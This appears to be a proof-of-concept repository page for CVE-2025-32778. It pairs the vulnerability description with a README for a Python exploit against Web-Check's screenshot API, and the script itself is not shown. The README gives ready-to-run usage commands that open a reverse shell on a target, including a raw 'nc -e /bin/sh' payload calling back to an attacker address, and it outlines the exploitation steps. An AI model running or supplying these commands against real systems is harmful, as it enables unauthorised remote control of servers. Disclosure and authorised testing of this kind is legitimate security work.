CVE-2025-32778 PoC — Web-Check allows command Injection via Unvalidated URL in Screenshot API

Associated Vulnerability
Title: Web-Check allows command Injection via Unvalidated URL in Screenshot API (CVE-2025-32778)
Description: Web-Check is an all-in-one OSINT tool for analyzing any website. A command injection vulnerability exists in the screenshot API of the Web Check project (Lissy93/web-check). The issue stems from user-controlled input (url) being passed unsanitized into a shell command using exec(), allowing attackers to execute arbitrary system commands on the underlying host. This could be exploited by sending crafted url parameters to extract files or even establish remote access. The vulnerability has been patched by replacing exec() with execFile(), which avoids using a shell and properly isolates arguments.
Readme
# CVE-2025-32778 - Web-Check Command Injection Exploit

[![Critical](https://img.shields.io/badge/CVSS-9.3-critical)](https://nvd.nist.gov/vuln/detail/CVE-2025-32778)
[![Language: Python](https://img.shields.io/badge/Python-3.x-blue)](https://www.python.org/)

## Description

CVE-2025-32778 is a critical command injection vulnerability in the **Web-Check** OSINT tool by Lissy93.  
It allows unauthenticated attackers to execute arbitrary system commands via the `url` parameter in the screenshot API.

This Python script automates exploitation and can generate reverse shells or accept custom shell payloads.

---

## Warning

- Only test on systems you own or are authorized to test.
- Unauthorized use is illegal and unethical.

---

## Features

- Exploit `url` command injection in Web-Check.
- Supports:
  - Reverse shell with `--lhost` and `--lport`.
  - Custom shell via `--shell`.
- URL normalization.
- Prevents combining `--shell` with `--lhost/--lport`.

---

## Requirements

- Python 3.x
- Requests library:

```bash
pip install requests
```
---
## Usage
```bash
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778
```
### Make the tool create a reverse shell
```bash
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 192.168.1.4 --lport 4444
```
### Custom Shell Payload (Raw)
```bash
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 192.168.1.4 4444"
```
### Help Menu
```bash
python3 cve-2025-32778.py -h
```
---
## How It Works

1. Normalize the target URL to `scheme://host[:port]`.

2. Prepare the payload:
   * Generate a reverse shell using `--lhost` and `--lport`.
   * Or use a raw shell command with `--shell`.

3. Encode the shell payload for safe URL injection.

4. Send an HTTP GET request to `/api/screenshot/` with the payload.

5. Wait for the reverse shell connection.

---
## References
- [Web-Check GitHub Repository](https://github.com/lissy93/web-check) – Original project containing the vulnerable code.
- [CVE-2025-32778](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32778) – CVE entry describing the command injection vulnerability.

File Snapshot

[4.0K] /data/pocs/190616bd431fa63c780ecd06f4438349e8dfa92b
├── [3.4K] cve-2025-32778
└── [2.1K] README.md

0 directories, 2 files